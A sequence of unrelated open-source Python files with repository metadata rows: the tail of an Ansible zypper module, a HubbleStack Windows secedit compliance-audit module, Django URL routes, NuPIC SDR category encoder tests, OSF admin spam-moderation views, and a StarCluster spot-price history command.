m.fail_json(msg="Can not remove patches.")
prerun_state = get_installed_state(m, name_remove)
name_remove = [p for p in name_remove if p in prerun_state]
if not name_remove:
return retvals
cmd = get_cmd(m, 'remove')
cmd.extend(name_remove)
retvals['cmd'] = cmd
result, retvals['rc'], retvals['stdout'], retvals['stderr'] = parse_zypper_xml(m, cmd)
if retvals['rc'] == 0:
# removed packages successfully
if result:
retvals['changed'] = True
else:
retvals['failed'] = True
if m._diff:
set_diff(m, retvals, result)
return retvals
# ===========================================
# Main control flow
def main():
module = AnsibleModule(
argument_spec = dict(
name = dict(required=True, aliases=['pkg'], type='list'),
state = dict(required=False, default='present', choices=['absent', 'installed', 'latest', 'present', 'removed']),
type = dict(required=False, default='package', choices=['package', 'patch', 'pattern', 'product', 'srcpackage', 'application']),
disable_gpg_check = dict(required=False, default='no', type='bool'),
disable_recommends = dict(required=False, default='yes', type='bool'),
force = dict(required=False, default='no', type='bool'),
),
supports_check_mode = True
)
name = module.params['name']
state = module.params['state']
# Perform requested action
if name == ['*'] and state == 'latest':
if module.params['type'] == 'package':
retvals = package_update_all(module, False)
elif module.params['type'] == 'patch':
retvals = package_update_all(module, True)
else:
if state in ['absent', 'removed']:
retvals = package_absent(module, name)
elif state in ['installed', 'present', 'latest']:
retvals = package_present(module, name, state == 'latest')
failed = retvals['failed']
del retvals['failed']
if failed:
module.fail_json(msg="Zypper run failed.", **retvals)
if not retvals['changed']:
del retvals['stdout']
del retvals['stderr']
module.exit_json(name=name, state=state, **retvals)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 | 8,136,235,898,409,910,000 | 34.981233 | 215 | 0.615602 | false |
madchills/hubble | hubblestack/files/hubblestack_nova/win_secedit.py | 1 | 15598 | # -*- encoding: utf-8 -*-
'''
:maintainer: HubbleStack / madchills
:maturity: 2016.7.0
:platform: Windows
:requires: SaltStack
'''
from __future__ import absolute_import
import copy
import fnmatch
import logging
import salt.utils
from pprint import pprint
try:
import codecs
import uuid
HAS_WINDOWS_MODULES = True
except ImportError:
HAS_WINDOWS_MODULES = False
log = logging.getLogger(__name__)
__virtualname__ = 'win_secedit'
def __virtual__():
if not salt.utils.is_windows() or not HAS_WINDOWS_MODULES:
return False, 'This audit module only runs on windows'
return True
def audit(data_list, tags, debug=False):
'''
Runs secedit on the local machine and audits the return data
with the CIS yaml processed by __virtual__
'''
__data__ = {}
__secdata__ = _secedit_export()
__sidaccounts__ = _get_account_sid()
for profile, data in data_list:
_merge_yaml(__data__, data, profile)
__tags__ = _get_tags(__data__)
if debug:
log.debug('secedit audit __data__:')
log.debug(__data__)
log.debug('secedit audit __tags__:')
log.debug(__tags__)
ret = {'Success': [], 'Failure': [], 'Controlled': []}
for tag in __tags__:
if fnmatch.fnmatch(tag, tags):
for tag_data in __tags__[tag]:
if 'control' in tag_data:
ret['Controlled'].append(tag_data)
continue
name = tag_data['name']
audit_type = tag_data['type']
output = tag_data['match_output'].lower()
# Blacklisted audit (do not include)
if audit_type == 'blacklist':
if 'no one' in output:
if name not in __secdata__:
ret['Success'].append(tag_data)
else:
ret['Failure'].append(tag_data)
else:
if name in __secdata__:
secret = _translate_value_type(__secdata__[name], tag_data['value_type'], tag_data['match_output'])
if secret:
ret['Failure'].append(tag_data)
else:
ret['Success'].append(tag_data)
# Whitelisted audit (must include)
if audit_type == 'whitelist':
if name in __secdata__:
sec_value = __secdata__[name]
tag_data['found_value'] = sec_value
if 'MACHINE\\' in name:
match_output = _reg_value_translator(tag_data['match_output'])
else:
match_output = tag_data['match_output']
if ',' in sec_value and '\\' in sec_value:
sec_value = sec_value.split(',')
match_output = match_output.split(',')
if 'account' in tag_data['value_type']:
secret = _translate_value_type(sec_value, tag_data['value_type'], match_output, __sidaccounts__)
else:
secret = _translate_value_type(sec_value, tag_data['value_type'], match_output)
if secret:
ret['Success'].append(tag_data)
else:
ret['Failure'].append(tag_data)
else:
log.error('name {} was not in __secdata__'.format(name))
ret['Failure'].append(tag_data)
return ret
def _merge_yaml(ret, data, profile=None):
'''
Merge two yaml dicts together at the secedit:blacklist and
secedit:whitelist level
'''
if __virtualname__ not in ret:
ret[__virtualname__] = {}
for topkey in ('blacklist', 'whitelist'):
if topkey in data.get(__virtualname__, {}):
if topkey not in ret[__virtualname__]:
ret[__virtualname__][topkey] = []
for key, val in data[__virtualname__][topkey].iteritems():
if profile and isinstance(val, dict):
val['nova_profile'] = profile
ret[__virtualname__][topkey].append({key: val})
return ret
def _get_tags(data):
'''
Retrieve all the tags for this distro from the yaml
'''
ret = {}
distro = __grains__.get('osfullname')
for toplist, toplevel in data.get(__virtualname__, {}).iteritems():
# secedit:whitelist
for audit_dict in toplevel:
for audit_id, audit_data in audit_dict.iteritems():
# secedit:whitelist:PasswordComplexity
tags_dict = audit_data.get('data', {})
# secedit:whitelist:PasswordComplexity:data
tags = None
for osfinger in tags_dict:
if osfinger == '*':
continue
osfinger_list = [finger.strip() for finger in osfinger.split(',')]
for osfinger_glob in osfinger_list:
if fnmatch.fnmatch(distro, osfinger_glob):
tags = tags_dict.get(osfinger)
break
if tags is not None:
break
# If we didn't find a match, check for a '*'
if tags is None:
tags = tags_dict.get('*', [])
# secedit:whitelist:PasswordComplexity:data:Server 2012
if isinstance(tags, dict):
# malformed yaml, convert to list of dicts
tmp = []
for name, tag in tags.iteritems():
tmp.append({name: tag})
tags = tmp
for item in tags:
for name, tag in item.iteritems():
tag_data = {}
# Whitelist could have a dictionary, not a string
if isinstance(tag, dict):
tag_data = copy.deepcopy(tag)
tag = tag_data.pop('tag')
if tag not in ret:
ret[tag] = []
formatted_data = {'name': name,
'tag': tag,
'module': 'win_secedit',
'type': toplist}
formatted_data.update(tag_data)
formatted_data.update(audit_data)
formatted_data.pop('data')
ret[tag].append(formatted_data)
return ret
def _secedit_export():
'''Helper function that will create(dump) a secedit inf file. You can
specify the location of the file and the file will persist, or let the
function create it and the file will be deleted on completion. Should
only be called once.'''
dump = "C:\ProgramData\{}.inf".format(uuid.uuid4())
try:
ret = __salt__['cmd.run']('secedit /export /cfg {0}'.format(dump))
if ret:
secedit_ret = _secedit_import(dump)
ret = __salt__['file.remove'](dump)
return secedit_ret
except StandardError:
log.debug('Error occurred while trying to get / export secedit data')
return False, None
def _secedit_import(inf_file):
'''This function takes the inf file that SecEdit dumps
and returns a dictionary'''
sec_return = {}
with codecs.open(inf_file, 'r', encoding='utf-16') as f:
for line in f:
line = str(line).replace('\r\n', '')
if not line.startswith('[') and not line.startswith('Unicode'):
if line.find(' = ') != -1:
k, v = line.split(' = ')
sec_return[k] = v
else:
k, v = line.split('=')
sec_return[k] = v
return sec_return
def _get_account_sid():
'''This helper function will get all the users and groups on the computer
and return a dictionary'''
win32 = __salt__['cmd.run']('Get-WmiObject win32_useraccount -Filter "localaccount=\'True\'"'
' | Format-List -Property Name, SID', shell='powershell',
python_shell=True)
win32 += '\n'
win32 += __salt__['cmd.run']('Get-WmiObject win32_group -Filter "localaccount=\'True\'" | '
'Format-List -Property Name, SID', shell='powershell',
python_shell=True)
if win32:
dict_return = {}
lines = win32.split('\n')
lines = filter(None, lines)
if 'local:' in lines:
lines.remove('local:')
for line in lines:
line = line.strip()
if line != '' and ' : ' in line:
k, v = line.split(' : ')
if k.lower() == 'name':
key = v
else:
dict_return[key] = v
if dict_return:
if 'LOCAL SERVICE' not in dict_return:
dict_return['LOCAL SERVICE'] = 'S-1-5-19'
if 'NETWORK SERVICE' not in dict_return:
dict_return['NETWORK SERVICE'] = 'S-1-5-20'
if 'SERVICE' not in dict_return:
dict_return['SERVICE'] = 'S-1-5-6'
return dict_return
else:
log.debug('Error parsing the data returned from powershell')
return False
else:
log.debug('error occurred while trying to run powershell '
'get-wmiobject command')
return False
def _translate_value_type(current, value, evaluator, __sidaccounts__=False):
'''This will take a value type and convert it to what it needs to do.
Under the covers you have conversion for more, less, and equal'''
value = value.lower()
if 'more' in value:
if ',' in evaluator:
evaluator = evaluator.split(',')[1]
if ',' in current:
current = current.split(',')[1]
if '"' in current:
current = current.replace('"', '')
if '"' in evaluator:
evaluator = evaluator.replace('"', '')
if int(current) >= int(evaluator):
return True
else:
return False
elif 'less' in value:
if ',' in evaluator:
evaluator = evaluator.split(',')[1]
if ',' in current:
current = current.split(',')[1]
if '"' in current:
current = current.replace('"', '')
if '"' in evaluator:
evaluator = evaluator.replace('"', '')
if int(current) <= int(evaluator):
if current != '0':
return True
else:
return False
else:
return False
elif 'equal' in value:
if ',' not in evaluator and type(evaluator) != list:
evaluator = _evaluator_translator(evaluator)
if type(current) == list:
ret_final = []
for item in current:
item = item.lower()
if item in evaluator:
ret_final.append(True)
else:
ret_final.append(False)
if False in ret_final:
return False
else:
return True
if current.lower() == evaluator:
return True
else:
return False
elif 'account' in value:
evaluator = _account_audit(evaluator, __sidaccounts__)
evaluator_list = evaluator.split(',')
current_list = current.split(',')
list_match = False
for list_item in evaluator_list:
if list_item in current_list:
list_match = True
else:
list_match = False
break
if list_match:
for list_item in current_list:
if list_item in evaluator_list:
list_match = True
else:
list_match = False
break
else:
return False
if list_match:
return True
else:
return False
elif 'configured' in value:
if current == '':
return False
elif current == value:
return True
else:
return False
else:
return 'Undefined'
def _evaluator_translator(input_string):
'''This helper function takes words from the CIS yaml and replaces
them with what you actually find in the secedit dump'''
if type(input_string) == str:
input_string = input_string.replace(' ','').lower()
if 'enabled' in input_string:
return '1'
elif 'disabled' in input_string:
return '0'
elif 'success' in input_string:
return '1'
elif 'failure' in input_string:
return '2'
elif input_string == 'success,failure' or input_string == 'failure,success':
return '3'
elif input_string in ['0','1','2','3']:
return input_string
else:
log.debug('error translating evaluator from enabled/disabled or success/failure.'
' Could have received incorrect string')
return 'undefined'
def _account_audit(current, __sidaccounts__):
'''This helper function takes the account names from the cis yaml and
replaces them with the account SID that you find in the secedit dump'''
user_list = current.split(', ')
ret_string = ''
if __sidaccounts__:
for usr in user_list:
if usr == 'Guest':
if not ret_string:
ret_string = usr
else:
ret_string += ',' + usr
if usr in __sidaccounts__:
if not ret_string:
ret_string = '*' + __sidaccounts__[usr]
else:
ret_string += ',*' + __sidaccounts__[usr]
return ret_string
else:
log.debug('getting the SIDs for each account failed')
return False
def _reg_value_translator(input_string):
input_string = input_string.lower()
if input_string == 'enabled':
return '4,1'
elif input_string == 'disabled':
return '4,0'
elif input_string == 'users cant add or log on with microsoft accounts':
return '4,3'
elif input_string == 'administrators':
return '1,"0"'
elif input_string == 'lock workstation':
return '1,"1"'
elif input_string == 'accept if provided by client':
return '4,1'
elif input_string == 'classic - local users authenticate as themselves':
return '4,1'
elif input_string == 'rc4_hmac_md5, aes128_hmac_SHA1, aes256_hmac_sha1, future encryption types':
return '4,2147483644'
elif input_string == 'send ntlmv2 response only. Refuse lm & ntlm':
return '4,5'
elif input_string == 'negotiate signing':
return '4,1'
elif input_string == 'require ntlmv2 session security, require 128-bit encryption':
return '4,537395200'
elif input_string == 'prompt for consent on the secure desktop':
return '4,2'
elif input_string == 'automatically deny elevation requests':
return '4,0'
elif input_string == 'defined (blank)':
return '7,'
else:
return input_string
| apache-2.0 | -2,018,792,189,611,448,600 | 36.405276 | 127 | 0.501282 | false |
BridgesLab/mousedb | mousedb/animal/urls/strain.py | 2 | 1299 | """This module is the url dispatcher for strain related views.
It takes the root */strain...* and generates strain-list, strain-new, strain-edit, strain-delete, strain-detail and views from animal.views."""
from django.conf.urls import url
from mousedb.animal import views
from mousedb.data.views import StrainData, StrainDataCSV
urlpatterns = [
url(r'^$', views.StrainList.as_view(), name="strain-list"),
url(r'^new/?$', views.StrainCreate.as_view(), name="strain-new"),
url(r'^(?P<slug>[-\w]+)/edit/?$', views.StrainUpdate.as_view(), name="strain-edit"),
url(r'^(?P<slug>[-\w]+)/update/?$', views.StrainUpdate.as_view(), name="strain-edit"),
url(r'^(?P<slug>[-\w]+)/delete/?$',
views.StrainDelete.as_view(),
name="strain-delete"),
url(r'^(?P<slug>[-\w]+)/all/?$', views.StrainDetailAll.as_view(), name="strain-all"),
url(r'^(?P<strain_slug>[-\w]+)/data/?$', StrainData.as_view(), name="strain-data"),
url(r'^(?P<strain_slug>[-\w]+)/data.csv$',
StrainDataCSV.as_view(),
name="strain-data-csv"),
url(r'^(?P<strain_slug>[-\w]+)/(?P<breeding_type>[\w-]+)/?$',
views.CrossTypeAnimalList.as_view(),
name="strain-crosstype"),
url(r'^(?P<slug>[-\w]+)/?$', views.StrainDetail.as_view(), name="strain-detail"),
]
| bsd-3-clause | -7,035,022,910,947,002,000 | 45.392857 | 143 | 0.617398 | false |
rcrowder/nupic | tests/unit/nupic/encoders/sdrcategory_test.py | 10 | 10958 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013-2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for SDR Category encoder"""
import numpy
from nupic.data import SENTINEL_VALUE_FOR_MISSING_DATA
import tempfile
import unittest
from nupic.encoders.sdr_category import SDRCategoryEncoder
try:
import capnp
except ImportError:
capnp = None
if capnp:
from nupic.encoders.sdr_category_capnp import SDRCategoryEncoderProto
class SDRCategoryEncoderTest(unittest.TestCase):
"""Unit tests for SDRCategory encoder class"""
def testSDRCategoryEncoder(self):
# make sure we have > 16 categories so that we have to grow our sdrs
categories = ["ES", "S1", "S2", "S3", "S4", "S5", "S6", "S7", "S8",
"S9","S10", "S11", "S12", "S13", "S14", "S15", "S16",
"S17", "S18", "S19", "GB", "US"]
fieldWidth = 100
bitsOn = 10
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, categoryList = categories,
name="foo", verbosity=0, forced=True)
# internal check
self.assertEqual(s.sdrs.shape, (32, fieldWidth))
# ES
es = s.encode("ES")
self.assertEqual(es.sum(), bitsOn)
self.assertEqual(es.shape, (fieldWidth,))
self.assertEqual(es.sum(), bitsOn)
x = s.decode(es)
self.assertIsInstance(x[0], dict)
self.assertTrue("foo" in x[0])
self.assertEqual(x[0]["foo"][1], "ES")
topDown = s.topDownCompute(es)
self.assertEqual(topDown.value, "ES")
self.assertEqual(topDown.scalar, 1)
self.assertEqual(topDown.encoding.sum(), bitsOn)
# ----------------------------------------------------------------------
# Test topdown compute
for v in categories:
output = s.encode(v)
topDown = s.topDownCompute(output)
self.assertEqual(topDown.value, v)
self.assertEqual(topDown.scalar, s.getScalars(v)[0])
bucketIndices = s.getBucketIndices(v)
topDown = s.getBucketInfo(bucketIndices)[0]
self.assertEqual(topDown.value, v)
self.assertEqual(topDown.scalar, s.getScalars(v)[0])
self.assertTrue(numpy.array_equal(topDown.encoding, output))
self.assertEqual(topDown.value, s.getBucketValues()[bucketIndices[0]])
# Unknown
unknown = s.encode("ASDFLKJLK")
self.assertEqual(unknown.sum(), bitsOn)
self.assertEqual(unknown.shape, (fieldWidth,))
self.assertEqual(unknown.sum(), bitsOn)
x = s.decode(unknown)
self.assertEqual(x[0]["foo"][1], "<UNKNOWN>")
topDown = s.topDownCompute(unknown)
self.assertEqual(topDown.value, "<UNKNOWN>")
self.assertEqual(topDown.scalar, 0)
# US
us = s.encode("US")
self.assertEqual(us.sum(), bitsOn)
self.assertEqual(us.shape, (fieldWidth,))
self.assertEqual(us.sum(), bitsOn)
x = s.decode(us)
self.assertEqual(x[0]["foo"][1], "US")
topDown = s.topDownCompute(us)
self.assertEqual(topDown.value, "US")
self.assertEqual(topDown.scalar, len(categories))
self.assertEqual(topDown.encoding.sum(), bitsOn)
# empty field
empty = s.encode(SENTINEL_VALUE_FOR_MISSING_DATA)
self.assertEqual(empty.sum(), 0)
self.assertEqual(empty.shape, (fieldWidth,))
self.assertEqual(empty.sum(), 0)
# make sure it can still be decoded after a change
bit = s.random.getUInt32(s.getWidth()-1)
us[bit] = 1 - us[bit]
x = s.decode(us)
self.assertEqual(x[0]["foo"][1], "US")
# add two reps together
newrep = ((us + unknown) > 0).astype(numpy.uint8)
x = s.decode(newrep)
name =x[0]["foo"][1]
if name != "US <UNKNOWN>" and name != "<UNKNOWN> US":
othercategory = name.replace("US", "")
othercategory = othercategory.replace("<UNKNOWN>", "")
othercategory = othercategory.replace(" ", "")
otherencoded = s.encode(othercategory)
raise RuntimeError("Decoding failure")
# serialization
# TODO: Remove pickle-based serialization tests -- issues #1419 and #1420
import cPickle as pickle
t = pickle.loads(pickle.dumps(s))
self.assertTrue((t.encode("ES") == es).all())
self.assertTrue((t.encode("GB") == s.encode("GB")).all())
# Test autogrow
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, categoryList=None,
name="bar", forced=True)
es = s.encode("ES")
self.assertEqual(es.shape, (fieldWidth,))
self.assertEqual(es.sum(), bitsOn)
x = s.decode(es)
self.assertIsInstance(x[0], dict)
self.assertTrue("bar" in x[0])
self.assertEqual(x[0]["bar"][1], "ES")
us = s.encode("US")
self.assertEqual(us.shape, (fieldWidth,))
self.assertEqual(us.sum(), bitsOn)
x = s.decode(us)
self.assertEqual(x[0]["bar"][1], "US")
es2 = s.encode("ES")
self.assertTrue(numpy.array_equal(es2, es))
us2 = s.encode("US")
self.assertTrue(numpy.array_equal(us2, us))
# make sure it can still be decoded after a change
bit = s.random.getUInt32(s.getWidth() - 1)
us[bit] = 1 - us[bit]
x = s.decode(us)
self.assertEqual(x[0]["bar"][1], "US")
# add two reps together
newrep = ((us + es) > 0).astype(numpy.uint8)
x = s.decode(newrep)
name = x[0]["bar"][1]
self.assertTrue(name == "US ES" or name == "ES US")
# Catch duplicate categories
caughtException = False
newcategories = categories[:]
self.assertTrue("ES" in newcategories)
newcategories.append("ES")
try:
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn,
categoryList=newcategories, name="foo",
forced=True)
except RuntimeError, e:
caughtException = True
finally:
if not caughtException:
raise RuntimeError("Did not catch duplicate category in constructor")
# serialization for autogrow encoder
gs = s.encode("GS")
# TODO: Remove as part of issues #1419 and #1420
t = pickle.loads(pickle.dumps(s))
self.assertTrue(numpy.array_equal(t.encode("ES"), es))
self.assertTrue(numpy.array_equal(t.encode("GS"), gs))
# -----------------------------------------------------------------------
def testAutogrow(self):
"""testing auto-grow"""
fieldWidth = 100
bitsOn = 10
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, name="foo", verbosity=2,
forced=True)
encoded = numpy.zeros(fieldWidth)
self.assertEqual(s.topDownCompute(encoded).value, "<UNKNOWN>")
s.encodeIntoArray("catA", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catA"), 1)
catA = encoded.copy()
s.encodeIntoArray("catB", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catB"), 2)
catB = encoded.copy()
self.assertEqual(s.topDownCompute(catA).value, "catA")
self.assertEqual(s.topDownCompute(catB).value, "catB")
s.encodeIntoArray(SENTINEL_VALUE_FOR_MISSING_DATA, encoded)
self.assertEqual(sum(encoded), 0)
self.assertEqual(s.topDownCompute(encoded).value, "<UNKNOWN>")
#Test Disabling Learning and autogrow
s.setLearning(False)
s.encodeIntoArray("catC", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catC"), 0)
self.assertEqual(s.topDownCompute(encoded).value, "<UNKNOWN>")
s.setLearning(True)
s.encodeIntoArray("catC", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catC"), 3)
self.assertEqual(s.topDownCompute(encoded).value, "catC")
@unittest.skipUnless(
capnp, "pycapnp is not installed, skipping serialization test.")
def testReadWrite(self):
categories = ["ES", "S1", "S2", "S3", "S4", "S5", "S6", "S7", "S8",
"S9","S10", "S11", "S12", "S13", "S14", "S15", "S16",
"S17", "S18", "S19", "GB", "US"]
fieldWidth = 100
bitsOn = 10
original = SDRCategoryEncoder(n=fieldWidth, w=bitsOn,
categoryList=categories,
name="foo", verbosity=0, forced=True)
# internal check
self.assertEqual(original.sdrs.shape, (32, fieldWidth))
# ES
es = original.encode("ES")
self.assertEqual(es.sum(), bitsOn)
self.assertEqual(es.shape, (fieldWidth,))
self.assertEqual(es.sum(), bitsOn)
decoded = original.decode(es)
proto1 = SDRCategoryEncoderProto.new_message()
original.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = SDRCategoryEncoderProto.read(f)
encoder = SDRCategoryEncoder.read(proto2)
self.assertIsInstance(encoder, SDRCategoryEncoder)
self.assertEqual(encoder.n, original.n)
self.assertEqual(encoder.w, original.w)
self.assertEqual(encoder.verbosity, original.verbosity)
self.assertEqual(encoder.description, original.description)
self.assertEqual(encoder.name, original.name)
self.assertDictEqual(encoder.categoryToIndex, original.categoryToIndex)
self.assertTrue(numpy.array_equal(encoder.encode("ES"), es))
self.assertEqual(original.decode(encoder.encode("ES")),
encoder.decode(original.encode("ES")))
self.assertEqual(decoded, encoder.decode(es))
# Test autogrow serialization
autogrow = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, categoryList = None,
name="bar", forced=True)
es = autogrow.encode("ES")
us = autogrow.encode("US")
gs = autogrow.encode("GS")
proto1 = SDRCategoryEncoderProto.new_message()
autogrow.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = SDRCategoryEncoderProto.read(f)
t = SDRCategoryEncoder.read(proto2)
self.assertTrue(numpy.array_equal(t.encode("ES"), es))
self.assertTrue(numpy.array_equal(t.encode("US"), us))
self.assertTrue(numpy.array_equal(t.encode("GS"), gs))
if __name__ == "__main__":
unittest.main()
| agpl-3.0 | -6,725,890,087,020,795,000 | 32.613497 | 78 | 0.633966 | false |
cwisecarver/osf.io | admin/spam/views.py | 13 | 5073 | from __future__ import unicode_literals
from django.views.generic import FormView, ListView, DetailView
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.http import Http404
from osf.models.comment import Comment
from osf.models.user import OSFUser
from osf.models import SpamStatus
from osf.models.admin_log_entry import (
update_admin_log,
CONFIRM_HAM,
CONFIRM_SPAM,
)
from admin.spam.serializers import serialize_comment
from admin.spam.forms import ConfirmForm
from admin.spam.templatetags.spam_extras import reverse_spam_detail
class EmailView(PermissionRequiredMixin, DetailView):
template_name = 'spam/email.html'
context_object_name = 'spam'
permission_required = 'osf.view_spam'
def get_object(self, queryset=None):
spam_id = self.kwargs.get('spam_id')
try:
return serialize_comment(Comment.load(spam_id))
except AttributeError:
raise Http404('Spam with id {} not found.'.format(spam_id))
class SpamList(PermissionRequiredMixin, ListView):
""" Allow authorized admin user to see the things people have marked as spam
Interface with OSF database. No admin models.
"""
template_name = 'spam/spam_list.html'
paginate_by = 10
paginate_orphans = 1
ordering = '-date_last_reported'
context_object_name = 'spam'
permission_required = 'osf.view_spam'
raise_exception = True
def get_queryset(self):
return Comment.objects.filter(
spam_status=int(self.request.GET.get('status', '1'))
).exclude(reports={}).exclude(reports=None)
def get_context_data(self, **kwargs):
queryset = kwargs.pop('object_list', self.object_list)
page_size = self.get_paginate_by(queryset)
paginator, page, queryset, is_paginated = self.paginate_queryset(
queryset, page_size)
kwargs.setdefault('spam', map(serialize_comment, queryset))
kwargs.setdefault('page', page)
kwargs.setdefault('status', self.request.GET.get('status', '1'))
kwargs.setdefault('page_number', page.number)
return super(SpamList, self).get_context_data(**kwargs)
class UserSpamList(SpamList):
""" Allow authorized admin user to see the comments a user has had
marked spam
Interface with OSF database. No admin models.
"""
template_name = 'spam/user.html'
def get_queryset(self):
user = OSFUser.load(self.kwargs.get('user_id', None))
return Comment.objects.filter(
spam_status=int(self.request.GET.get('status', '1')),
user=user
).exclude(reports={}).exclude(reports=None).order_by(self.ordering)
def get_context_data(self, **kwargs):
kwargs.setdefault('user_id', self.kwargs.get('user_id', None))
return super(UserSpamList, self).get_context_data(**kwargs)
class SpamDetail(PermissionRequiredMixin, FormView):
""" Allow authorized admin user to see details of reported spam.
Interface with OSF database. Logs action (confirming spam) on admin db.
"""
form_class = ConfirmForm
template_name = 'spam/detail.html'
permission_required = 'osf.view_spam'
raise_exception = True
def get_context_data(self, **kwargs):
spam_id = self.kwargs.get('spam_id')
kwargs = super(SpamDetail, self).get_context_data(**kwargs)
try:
kwargs.setdefault('comment',
serialize_comment(Comment.load(spam_id)))
except AttributeError:
raise Http404('Spam with id "{}" not found.'.format(spam_id))
kwargs.setdefault('page_number', self.request.GET.get('page', '1'))
kwargs.setdefault('status', self.request.GET.get('status', '1'))
kwargs.update({'SPAM_STATUS': SpamStatus}) # Pass status in to check against
return kwargs
def form_valid(self, form):
spam_id = self.kwargs.get('spam_id')
item = Comment.load(spam_id)
try:
if int(form.cleaned_data.get('confirm')) == SpamStatus.SPAM:
item.confirm_spam()
item.is_deleted = True
log_message = 'Confirmed SPAM: {}'.format(spam_id)
log_action = CONFIRM_SPAM
else:
item.confirm_ham()
item.is_deleted = False
log_message = 'Confirmed HAM: {}'.format(spam_id)
log_action = CONFIRM_HAM
item.save()
except AttributeError:
raise Http404('Spam with id "{}" not found.'.format(spam_id))
update_admin_log(
user_id=self.request.user.id,
object_id=spam_id,
object_repr='Comment',
message=log_message,
action_flag=log_action
)
return super(SpamDetail, self).form_valid(form)
@property
def success_url(self):
return reverse_spam_detail(
self.kwargs.get('spam_id'),
page=self.request.GET.get('page', '1'),
status=self.request.GET.get('status', '1')
)
| apache-2.0 | 246,785,988,212,605,500 | 35.235714 | 85 | 0.632367 | false |
datacratic/StarCluster | starcluster/commands/spothistory.py | 4 | 6149 | # Copyright 2009-2014 Justin Riley
#
# This file is part of StarCluster.
#
# StarCluster is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# StarCluster is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with StarCluster. If not, see <http://www.gnu.org/licenses/>.
from datetime import timedelta
from starcluster import utils
from starcluster import static
from base import CmdBase
class CmdSpotHistory(CmdBase):
"""
spothistory [options] <instance_type>
Show spot instance pricing history stats (last 30 days by default)
Examples:
Show the current, max, and average spot price for m1.small instance type:
$ starcluster spothistory m1.small
Do the same but also plot the spot history over time in a web browser:
$ starcluster spothistory -p m1.small
Show it based on a current cluster config and zone
$ starcluster spothistory -c <cluster-name>
"""
names = ['spothistory', 'shi']
def addopts(self, parser):
parser.add_option("-z", "--zone", dest="zone", default=None,
help="limit results to specific availability zone")
parser.add_option("-d", "--days", dest="days_ago",
action="store", type="float", default=None,
help="provide history in the last DAYS_AGO days "
"(overrides -s option)")
parser.add_option("-s", "--start-time", dest="start_time",
action="callback", type="string", default=None,
callback=self._iso_timestamp,
help="show price history after START_TIME (UTC)"
"(e.g. 2010-01-15T22:22:22Z)")
parser.add_option("-e", "--end-time", dest="end_time",
action="callback", type="string", default=None,
callback=self._iso_timestamp,
help="show price history up until END_TIME (UTC)"
"(e.g. 2010-02-15T22:22:22Z)")
parser.add_option("-p", "--plot", dest="plot",
action="store_true", default=False,
help="plot spot history in a web browser")
parser.add_option("--cluster-name", dest="cluster_name",
default=None,
help="limit results to the clusters master node "
"availability zone")
parser.add_option("-v", "--vpc", dest="vpc",
action="store_true", default=False,
help="show spot prices for VPC")
parser.add_option("-c", "--classic", dest="classic",
action="store_true", default=False,
help="show spot prices for EC2-Classic")
def execute(self, args):
instance_types = ', '.join(static.INSTANCE_TYPES.keys())
zone = None
instance_type = None
if self.opts.cluster_name:
cl = self.cm.get_cluster(self.opts.cluster_name,
require_keys=False)
instance_type = cl.node_instance_type
zone = cl.nodes[0].placement
self.log.info("Cluster zone: " + zone)
self.log.info("Cluster node instance type: " + instance_type)
if self.opts.zone:
if zone:
self.log.info("You specified a zone and a cluster to get the "
"zone from. Using the cluster zone.")
else:
zone = self.opts.zone
self.log.info("Specified zone: " + zone)
if instance_type:
if len(args) == 1:
self.log.info("You provided an instance type and a cluster to "
"get the instance type from. Using the cluster "
"instance type.")
elif len(args) != 1:
self.parser.error(
'please provide an instance type (options: %s)' %
instance_types)
else:
instance_type = args[0]
self.log.info("Specified instance type: " + instance_type)
if instance_type not in static.INSTANCE_TYPES:
self.parser.error(
'invalid instance type. possible options: %s' %
instance_types)
if self.opts.classic and self.opts.vpc:
self.parser.error("options -c and -v cannot be specified at "
"the same time")
instance_type = args[0]
if instance_type not in static.INSTANCE_TYPES:
self.parser.error('invalid instance type. possible options: %s' %
instance_types)
start = self.opts.start_time
end = self.opts.end_time
if self.opts.days_ago:
if self.opts.start_time:
self.parser.error("options -d and -s cannot be specified at "
"the same time")
if self.opts.end_time:
end_tup = utils.iso_to_datetime_tuple(self.opts.end_time)
else:
end_tup = utils.get_utc_now()
start = utils.datetime_tuple_to_iso(
end_tup - timedelta(days=self.opts.days_ago))
browser_cmd = self.cfg.globals.get("web_browser")
self.ec2.get_spot_history(instance_type, start, end,
zone=self.opts.zone, plot=self.opts.plot,
plot_web_browser=browser_cmd,
vpc=self.opts.vpc,
classic=self.opts.classic)
